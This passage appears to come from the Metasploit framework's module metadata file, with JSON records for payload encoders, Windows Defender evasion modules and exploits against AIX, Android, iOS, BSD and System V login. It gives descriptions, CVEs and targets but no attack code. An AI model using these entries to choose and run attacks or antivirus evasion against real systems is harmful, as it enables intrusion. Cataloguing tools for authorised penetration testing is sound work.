"disclosure_date": null,
"type": "encoder",
"author": [
"agix"
],
"description": "Register service if used with psexec for example",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/service.rb",
"is_install_path": true,
"ref_name": "x86/service",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/shikata_ga_nai": {
"name": "Polymorphic XOR Additive Feedback Encoder",
"full_name": "encoder/x86/shikata_ga_nai",
"rank": 600,
"disclosure_date": null,
"type": "encoder",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This encoder implements a polymorphic XOR additive feedback encoder.\n The decoder stub is generated based on dynamic instruction\n substitution and dynamic block ordering. Registers are also\n selected dynamically.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/shikata_ga_nai.rb",
"is_install_path": true,
"ref_name": "x86/shikata_ga_nai",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/single_static_bit": {
"name": "Single Static Bit",
"full_name": "encoder/x86/single_static_bit",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "Static value for specific bit",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/single_static_bit.rb",
"is_install_path": true,
"ref_name": "x86/single_static_bit",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/unicode_mixed": {
"name": "Alpha2 Alphanumeric Unicode Mixedcase Encoder",
"full_name": "encoder/x86/unicode_mixed",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"pusscat <pusscat@metasploit.com>",
"skylined <skylined@edup.tudelft.nl>"
],
"description": "Encodes payloads as unicode-safe mixedcase text. This encoder uses\n SkyLined's Alpha2 encoding suite.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/unicode_mixed.rb",
"is_install_path": true,
"ref_name": "x86/unicode_mixed",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/unicode_upper": {
"name": "Alpha2 Alphanumeric Unicode Uppercase Encoder",
"full_name": "encoder/x86/unicode_upper",
"rank": 0,
"disclosure_date": null,
"type": "encoder",
"author": [
"pusscat <pusscat@metasploit.com>",
"skylined <skylined@edup.tudelft.nl>"
],
"description": "Encodes payload as unicode-safe uppercase text. This encoder uses\n SkyLined's Alpha2 encoding suite.",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/encoders/x86/unicode_upper.rb",
"is_install_path": true,
"ref_name": "x86/unicode_upper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"encoder_x86/xor_dynamic": {
"name": "Dynamic key XOR Encoder",
"full_name": "encoder/x86/xor_dynamic",
"rank": 300,
"disclosure_date": null,
"type": "encoder",
"author": [
"lupman",
"phra"
],
"description": "An x86 XOR encoder with dynamic key size",
"references": [
],
"platform": "All",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-10 22:45:45 +0000",
"path": "/modules/encoders/x86/xor_dynamic.rb",
"is_install_path": true,
"ref_name": "x86/xor_dynamic",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"evasion_windows/windows_defender_exe": {
"name": "Microsoft Windows Defender Evasive Executable",
"full_name": "evasion/windows/windows_defender_exe",
"rank": 300,
"disclosure_date": null,
"type": "evasion",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module allows you to generate a Windows EXE that evades against Microsoft\n Windows Defender. Multiple techniques such as shellcode encryption, source code\n obfuscation, Metasm, and anti-emulation are used to achieve this.\n\n For best results, please try to use payloads that use a more secure channel\n such as HTTPS or RC4 in order to avoid the payload network traffic getting\n caught by antivirus better.",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": [
"Microsoft Windows"
],
"mod_time": "2018-10-06 16:04:07 +0000",
"path": "/modules/evasion/windows/windows_defender_exe.rb",
"is_install_path": true,
"ref_name": "windows/windows_defender_exe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"evasion_windows/windows_defender_js_hta": {
"name": "Microsoft Windows Defender Evasive JS.Net and HTA",
"full_name": "evasion/windows/windows_defender_js_hta",
"rank": 300,
"disclosure_date": null,
"type": "evasion",
"author": [
"sinmygit",
"Shelby Pace"
],
"description": "This module will generate an HTA file that writes and compiles a JScript.NET file\n containing shellcode on the target machine. After compilation, the generated EXE will\n execute the shellcode without interference from Windows Defender.\n\n It is recommended that you use a payload that uses RC4 or HTTPS for best experience.",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": [
"Microsoft Windows"
],
"mod_time": "2018-10-11 17:38:47 +0000",
"path": "/modules/evasion/windows/windows_defender_js_hta.rb",
"is_install_path": true,
"ref_name": "windows/windows_defender_js_hta",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_aix/local/ibstat_path": {
"name": "ibstat $PATH Privilege Escalation",
"full_name": "exploit/aix/local/ibstat_path",
"rank": 600,
"disclosure_date": "2013-09-24",
"type": "exploit",
"author": [
"Kristian Erik Hermansen",
"Sagi Shahar <sagi.shahar@mwrinfosecurity.com>",
"Kostas Lintovois <kostas.lintovois@mwrinfosecurity.com>"
],
"description": "This module exploits the trusted $PATH environment variable of the SUID binary \"ibstat\".",
"references": [
"CVE-2013-4011",
"OSVDB-95420",
"BID-61287",
"URL-http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827",
"URL-http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM AIX Version 6.1",
"IBM AIX Version 7.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/aix/local/ibstat_path.rb",
"is_install_path": true,
"ref_name": "aix/local/ibstat_path",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_aix/rpc_cmsd_opcode21": {
"name": "AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow",
"full_name": "exploit/aix/rpc_cmsd_opcode21",
"rank": 500,
"disclosure_date": "2009-10-07",
"type": "exploit",
"author": [
"Rodrigo Rubira Branco (BSDaemon)",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability in opcode 21 handled by\n rpc.cmsd on AIX. By making a request with a long string passed to the first\n argument of the \"rtable_create\" RPC, a stack based buffer overflow occurs. This\n leads to arbitrary code execution.\n\n NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where\n further attempts are not possible.",
"references": [
"CVE-2009-3699",
"OSVDB-58726",
"BID-36615",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825",
"URL-http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc"
],
"platform": "AIX",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM AIX Version 5.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/aix/rpc_cmsd_opcode21.rb",
"is_install_path": true,
"ref_name": "aix/rpc_cmsd_opcode21",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_aix/rpc_ttdbserverd_realpath": {
"name": "ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",
"full_name": "exploit/aix/rpc_ttdbserverd_realpath",
"rank": 500,
"disclosure_date": "2009-06-17",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>"
],
"description": "This module exploits a buffer overflow vulnerability in _tt_internal_realpath\n function of the ToolTalk database server (rpc.ttdbserverd).",
"references": [
"CVE-2009-2727",
"OSVDB-55151"
],
"platform": "AIX",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM AIX Version 6.1.4",
"IBM AIX Version 6.1.3",
"IBM AIX Version 6.1.2",
"IBM AIX Version 6.1.1",
"IBM AIX Version 6.1.0",
"IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7",
"IBM AIX Version 5.3.10",
"IBM AIX Version 5.3.9",
"IBM AIX Version 5.3.8",
"IBM AIX Version 5.3.7",
"Debug IBM AIX Version 6.1",
"Debug IBM AIX Version 5.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/aix/rpc_ttdbserverd_realpath.rb",
"is_install_path": true,
"ref_name": "aix/rpc_ttdbserverd_realpath",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/adb/adb_server_exec": {
"name": "Android ADB Debug Server Remote Payload Execution",
"full_name": "exploit/android/adb/adb_server_exec",
"rank": 600,
"disclosure_date": "2016-01-01",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Writes and spawns a native payload on an android device that is listening\n for adb debug messages.",
"references": [
],
"platform": "Linux",
"arch": "armle, x86, x64, mipsle",
"rport": 5555,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"armle",
"x86",
"x64",
"mipsle"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/android/adb/adb_server_exec.rb",
"is_install_path": true,
"ref_name": "android/adb/adb_server_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/browser/samsung_knox_smdm_url": {
"name": "Samsung Galaxy KNOX Android Browser RCE",
"full_name": "exploit/android/browser/samsung_knox_smdm_url",
"rank": 600,
"disclosure_date": "2014-11-12",
"type": "exploit",
"author": [
"Andre Moulu",
"jduck <jduck@metasploit.com>",
"joev <joev@metasploit.com>"
],
"description": "A vulnerability exists in the KNOX security component of the Samsung Galaxy\n firmware that allows a remote webpage to install an APK with arbitrary\n permissions by abusing the 'smdm://' protocol handler registered by the KNOX\n component.\n\n The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,\n and Ace 4.",
"references": [
"URL-http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html",
"OSVDB-114590"
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/android/browser/samsung_knox_smdm_url.rb",
"is_install_path": true,
"ref_name": "android/browser/samsung_knox_smdm_url",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/browser/stagefright_mp4_tx3g_64bit": {
"name": "Android Stagefright MP4 tx3g Integer Overflow",
"full_name": "exploit/android/browser/stagefright_mp4_tx3g_64bit",
"rank": 300,
"disclosure_date": "2015-08-13",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>",
"NorthBit"
],
"description": "This module exploits an integer overflow vulnerability in the Stagefright\n Library (libstagefright.so). The vulnerability occurs when parsing specially\n crafted MP4 files. While a wide variety of remote attack vectors exist, this\n particular exploit is designed to work within an HTML5 compliant browser.\n\n Exploitation is done by supplying a specially crafted MP4 file with two\n tx3g atoms that, when their sizes are summed, cause an integer overflow when\n processing the second atom. As a result, a temporary buffer is allocated\n with insufficient size and a memcpy call leads to a heap overflow.\n\n This version of the exploit uses a two-stage information leak based on\n corrupting the MetaData that the browser reads from mediaserver. This method\n is based on a technique published in NorthBit's Metaphor paper. First,\n we use a variant of their technique to read the address of a heap buffer\n located adjacent to a SampleIterator object as the video HTML element's\n videoHeight. Next, we read the vtable pointer from an empty Vector within\n the SampleIterator object using the video element's duration. This gives\n us a code address that we can use to determine the base address of\n libstagefright and construct a ROP chain dynamically.\n\n NOTE: the mediaserver process on many Android devices (Nexus, for example) is\n constrained by SELinux and thus cannot use the execve system call. To avoid\n this problem, the original exploit uses a kernel exploit payload that disables\n SELinux and spawns a shell as root. Work is underway to make the framework\n more amenable to these types of situations. Until that work is complete, this\n exploit will only yield a shell on devices without SELinux or with SELinux in\n permissive mode.",
"references": [
"CVE-2015-3864",
"URL-https://blog.exodusintel.com/2015/08/13/stagefright-mission-accomplished/",
"URL-http://googleprojectzero.blogspot.com/2015/09/stagefrightened.html",
"URL-https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf",
"URL-https://github.com/NorthBit/Metaphor",
"URL-http://drops.wooyun.org/papers/7558",
"URL-http://translate.wooyun.io/2015/08/08/Stagefright-Vulnerability-Disclosure.html",
"URL-https://www.nccgroup.trust/globalassets/our-research/uk/whitepapers/2016/01/libstagefright-exploit-notespdf/"
],
"platform": "Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Nexus 7 (Wi-Fi) (razor) with Android 5.0 (LRX21P)",
"Nexus 7 (Wi-Fi) (razor) with Android 5.0.1 (LRX22C)",
"Nexus 7 (Wi-Fi) (razor) with Android 5.0.2 (LRX22G)",
"Nexus 7 (Wi-Fi) (razor) with Android 5.1 (LMY47O)",
"Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY47V)",
"Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48G)",
"Nexus 7 (Wi-Fi) (razor) with Android 5.1.1 (LMY48I)",
"Nexus 7 (Mobile) (razorg) with Android 5.0.2 (LRX22G)",
"Nexus 7 (Mobile) (razorg) with Android 5.1 (LMY47O)",
"Nexus 7 (Mobile) (razorg) with Android 5.1.1 (LMY47V)",
"Nexus 5 (hammerhead) with Android 5.0 (LRX21O)",
"Nexus 5 (hammerhead) with Android 5.0.1 (LRX22C)",
"Nexus 5 (hammerhead) with Android 5.1 (LMY47D)",
"Nexus 5 (hammerhead) with Android 5.1 (LMY47I)",
"Nexus 5 (hammerhead) with Android 5.1.1 (LMY48B)",
"Nexus 5 (hammerhead) with Android 5.1.1 (LMY48I)",
"Nexus 6 (shamu) with Android 5.0 (LRX21O)",
"Nexus 6 (shamu) with Android 5.0.1 (LRX22C)",
"Nexus 6 (shamu) with Android 5.1 (LMY47D)",
"Nexus 6 (shamu) with Android 5.1 (LMY47E)",
"Nexus 6 (shamu) with Android 5.1 (LMY47I)",
"Nexus 6 (shamu) with Android 5.1.1 (LYZ28E)",
"Nexus 6 (shamu) with Android 5.1 (LMY47M)",
"Nexus 6 (shamu) with Android 5.1.1 (LMY47Z)",
"Nexus 6 (shamu) with Android 5.1.1 (LVY48C)",
"Nexus 6 (shamu) with Android 5.1.1 (LMY48I)",
"Nexus 6 (shamu) with Android 5.1.1 (LYZ28J)",
"Nexus 6 (shamu) with Android 5.1.1 (LVY48E)",
"Samsung Galaxy S5 (VZW SM-G900V) with Android 5.0 (LRX21T)"
],
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb",
"is_install_path": true,
"ref_name": "android/browser/stagefright_mp4_tx3g_64bit",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"stagefright"
]
}
},
"exploit_android/browser/webview_addjavascriptinterface": {
"name": "Android Browser and WebView addJavascriptInterface Code Execution",
"full_name": "exploit/android/browser/webview_addjavascriptinterface",
"rank": 600,
"disclosure_date": "2012-12-21",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>",
"joev <joev@metasploit.com>"
],
"description": "This module exploits a privilege escalation issue in Android < 4.2's WebView component\n that arises when untrusted Javascript code is executed by a WebView that has one or more\n Interfaces added to it. The untrusted Javascript code can call into the Java Reflection\n APIs exposed by the Interface and execute arbitrary commands.\n\n Some distributions of the Android Browser app have an addJavascriptInterface\n call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs\n 4.1.2 release of Android is known to be vulnerable.\n\n A secondary attack vector involves the WebViews embedded inside a large number\n of Android applications. Ad integrations are perhaps the worst offender here.\n If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS\n into the page displayed in the WebView, then you can inject the html/js served\n by this module and get a shell.\n\n Note: Adding a .js to the URL will return plain javascript (no HTML markup).",
"references": [
"URL-http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/",
"URL-https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/",
"URL-http://50.56.33.56/blog/?p=314",
"URL-https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/",
"URL-https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py",
"CVE-2012-6636",
"CVE-2013-4710",
"EDB-31519",
"OSVDB-97520"
],
"platform": "Android,Linux",
"arch": "dalvik, x86, armle, mipsle",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/android/browser/webview_addjavascriptinterface.rb",
"is_install_path": true,
"ref_name": "android/browser/webview_addjavascriptinterface",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/fileformat/adobe_reader_pdf_js_interface": {
"name": "Adobe Reader for Android addJavascriptInterface Exploit",
"full_name": "exploit/android/fileformat/adobe_reader_pdf_js_interface",
"rank": 400,
"disclosure_date": "2014-04-13",
"type": "exploit",
"author": [
"Yorick Koster",
"joev <joev@metasploit.com>"
],
"description": "Adobe Reader versions less than 11.2.0 exposes insecure native\n interfaces to untrusted javascript in a PDF. This module embeds the browser\n exploit from android/webview_addjavascriptinterface into a PDF to get a\n command shell on vulnerable versions of Reader.",
"references": [
"CVE-2014-0514",
"EDB-32884",
"OSVDB-105781"
],
"platform": "Android",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Android ARM",
"Android MIPSLE",
"Android X86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb",
"is_install_path": true,
"ref_name": "android/fileformat/adobe_reader_pdf_js_interface",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/local/futex_requeue": {
"name": "Android 'Towelroot' Futex Requeue Kernel Exploit",
"full_name": "exploit/android/local/futex_requeue",
"rank": 600,
"disclosure_date": "2014-05-03",
"type": "exploit",
"author": [
"Pinkie Pie",
"geohot",
"timwr"
],
"description": "This module exploits a bug in futex_requeue in the Linux kernel, using\n similar techniques employed by the towelroot exploit. Any Android device\n with a kernel built before June 2014 is likely to be vulnerable.",
"references": [
"CVE-2014-3153",
"URL-http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/",
"URL-http://blog.nativeflow.com/the-futex-vulnerability"
],
"platform": "Android,Linux",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Targeting",
"Default",
"New Samsung",
"Old Samsung",
"Samsung Grand"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/android/local/futex_requeue.rb",
"is_install_path": true,
"ref_name": "android/local/futex_requeue",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/local/put_user_vroot": {
"name": "Android get_user/put_user Exploit",
"full_name": "exploit/android/local/put_user_vroot",
"rank": 600,
"disclosure_date": "2013-09-06",
"type": "exploit",
"author": [
"fi01",
"cubeundcube",
"timwr"
],
"description": "This module exploits a missing check in the get_user and put_user API functions\n in the linux kernel before 3.5.5. The missing checks on these functions\n allow an unprivileged user to read and write kernel memory.\n This exploit first reads the kernel memory to identify the commit_creds and\n ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.\n The exploit was first discovered in the wild in the vroot rooting application.",
"references": [
"CVE-2013-6282",
"URL-http://forum.xda-developers.com/showthread.php?t=2434453",
"URL-https://github.com/fi01/libget_user_exploit",
"URL-http://forum.xda-developers.com/showthread.php?t=2565758"
],
"platform": "Android,Linux",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/android/local/put_user_vroot.rb",
"is_install_path": true,
"ref_name": "android/local/put_user_vroot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_android/local/su_exec": {
"name": "Android 'su' Privilege Escalation",
"full_name": "exploit/android/local/su_exec",
"rank": 0,
"disclosure_date": "2017-08-31",
"type": "exploit",
"author": [
"timwr"
],
"description": "This module uses the su binary present on rooted devices to run\n a payload as root.\n\n A rooted Android device will contain a su binary (often linked with\n an application) that allows the user to run commands as root.\n This module will use the su binary to execute a command stager\n as root. The command stager will write a payload binary to a\n temporary directory, make it executable, execute it in the background,\n and finally delete the executable.\n\n On most devices the su binary will pop-up a prompt on the device\n asking the user for permission.",
"references": [
],
"platform": "Android,Linux",
"arch": "aarch64, armle, x86, x64, mipsle",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"aarch64",
"armle",
"x86",
"x64",
"mipsle"
],
"mod_time": "2019-03-29 10:44:58 +0000",
"path": "/modules/exploits/android/local/su_exec.rb",
"is_install_path": true,
"ref_name": "android/local/su_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_apple_ios/browser/safari_libtiff": {
"name": "Apple iOS MobileSafari LibTIFF Buffer Overflow",
"full_name": "exploit/apple_ios/browser/safari_libtiff",
"rank": 400,
"disclosure_date": "2006-08-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"kf <kf_list@digitalmunition.com>"
],
"description": "This module exploits a buffer overflow in the version of\n libtiff shipped with firmware versions 1.00, 1.01, 1.02, and\n 1.1.1 of the Apple iPhone. iPhones which have not had the BSD\n tools installed will need to use a special payload.",
"references": [
"CVE-2006-3459",
"OSVDB-27723",
"BID-19283"
],
"platform": "OSX",
"arch": "armle",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/apple_ios/browser/safari_libtiff.rb",
"is_install_path": true,
"ref_name": "apple_ios/browser/safari_libtiff",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_apple_ios/browser/webkit_trident": {
"name": "WebKit not_number defineProperties UAF",
"full_name": "exploit/apple_ios/browser/webkit_trident",
"rank": 0,
"disclosure_date": "2016-08-25",
"type": "exploit",
"author": [
"qwertyoruiop",
"siguza",
"tihmstar",
"benjamin-42",
"timwr"
],
"description": "This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.",
"references": [
"CVE-2016-4655",
"CVE-2016-4656",
"CVE-2016-4657",
"BID-92651",
"BID-92652",
"BID-92653",
"URL-https://blog.lookout.com/trident-pegasus",
"URL-https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/",
"URL-https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf",
"URL-https://github.com/Siguza/PhoenixNonce",
"URL-https://jndok.github.io/2016/10/04/pegasus-writeup/",
"URL-https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html",
"URL-https://github.com/benjamin-42/Trident",
"URL-http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html"
],
"platform": "Apple_iOS",
"arch": "aarch64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-10-16 14:59:27 +0000",
"path": "/modules/exploits/apple_ios/browser/webkit_trident.rb",
"is_install_path": true,
"ref_name": "apple_ios/browser/webkit_trident",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_apple_ios/email/mobilemail_libtiff": {
"name": "Apple iOS MobileMail LibTIFF Buffer Overflow",
"full_name": "exploit/apple_ios/email/mobilemail_libtiff",
"rank": 400,
"disclosure_date": "2006-08-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"kf <kf_list@digitalmunition.com>"
],
"description": "This module exploits a buffer overflow in the version of\n libtiff shipped with firmware versions 1.00, 1.01, 1.02, and\n 1.1.1 of the Apple iPhone. iPhones which have not had the BSD\n tools installed will need to use a special payload.",
"references": [
"CVE-2006-3459",
"OSVDB-27723",
"BID-19283"
],
"platform": "OSX",
"arch": "armle",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/apple_ios/email/mobilemail_libtiff.rb",
"is_install_path": true,
"ref_name": "apple_ios/email/mobilemail_libtiff",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_apple_ios/ssh/cydia_default_ssh": {
"name": "Apple iOS Default SSH Password Vulnerability",
"full_name": "exploit/apple_ios/ssh/cydia_default_ssh",
"rank": 600,
"disclosure_date": "2007-07-02",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits the default credentials of Apple iOS when it\n has been jailbroken and the passwords for the 'root' and 'mobile'\n users have not been changed.",
"references": [
"OSVDB-61284"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Apple iOS"
],
"mod_time": "2018-12-12 15:41:35 +0000",
"path": "/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb",
"is_install_path": true,
"ref_name": "apple_ios/ssh/cydia_default_ssh",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_bsd/finger/morris_fingerd_bof": {
"name": "Morris Worm fingerd Stack Buffer Overflow",
"full_name": "exploit/bsd/finger/morris_fingerd_bof",
"rank": 300,
"disclosure_date": "1988-11-02",
"type": "exploit",
"author": [
"Robert Tappan Morris",
"Cliff Stoll",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in fingerd on 4.3BSD.\n This vulnerability was exploited by the Morris worm in 1988-11-02.\n Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.",
"references": [
"URL-https://en.wikipedia.org/wiki/Morris_worm",
"URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
"URL-http://computerarcheology.com/Virus/MorrisWorm/",
"URL-https://github.com/arialdomartini/morris-worm",
"URL-http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH"
],
"platform": "BSD",
"arch": "vax",
"rport": 79,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"@(#)fingerd.c 5.1 (Berkeley) 6/6/85"
],
"mod_time": "2018-11-22 23:10:57 +0000",
"path": "/modules/exploits/bsd/finger/morris_fingerd_bof.rb",
"is_install_path": true,
"ref_name": "bsd/finger/morris_fingerd_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_bsdi/softcart/mercantec_softcart": {
"name": "Mercantec SoftCart CGI Overflow",
"full_name": "exploit/bsdi/softcart/mercantec_softcart",
"rank": 500,
"disclosure_date": "2004-08-19",
"type": "exploit",
"author": [
"skape <mmiller@hick.org>",
"trew"
],
"description": "This is an exploit for an undisclosed buffer overflow\n in the SoftCart.exe CGI as shipped with Mercantec's shopping\n cart software. It is possible to execute arbitrary code\n by passing a malformed CGI parameter in an HTTP GET\n request. This issue is known to affect SoftCart version\n 4.00b.",
"references": [
"CVE-2004-2221",
"OSVDB-9011",
"BID-10926"
],
"platform": "BSDi",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"BSDi/4.3 Bruteforce"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/bsdi/softcart/mercantec_softcart.rb",
"is_install_path": true,
"ref_name": "bsdi/softcart/mercantec_softcart",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_dialup/multi/login/manyargs": {
"name": "System V Derived /bin/login Extraneous Arguments Buffer Overflow",
"full_name": "exploit/dialup/multi/login/manyargs",
"rank": 400,
"disclosure_date": "2001-12-12",
"type": "exploit",
"author": [
"I)ruid <druid@caughq.org>"
],
"description": "This exploit connects to a system's modem over dialup and exploits\n a buffer overflow vulnerability in it's System V derived /bin/login.\n The vulnerability is triggered by providing a large number of arguments.",
"references": [
"CVE-2001-0797",
"OSVDB-690",
"OSVDB-691",
"BID-3681",
"URL-http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html",
"URL-http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html"
],
"platform": "Unix",
"arch": "tty",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Solaris 2.6 - 8 (SPARC)"
],
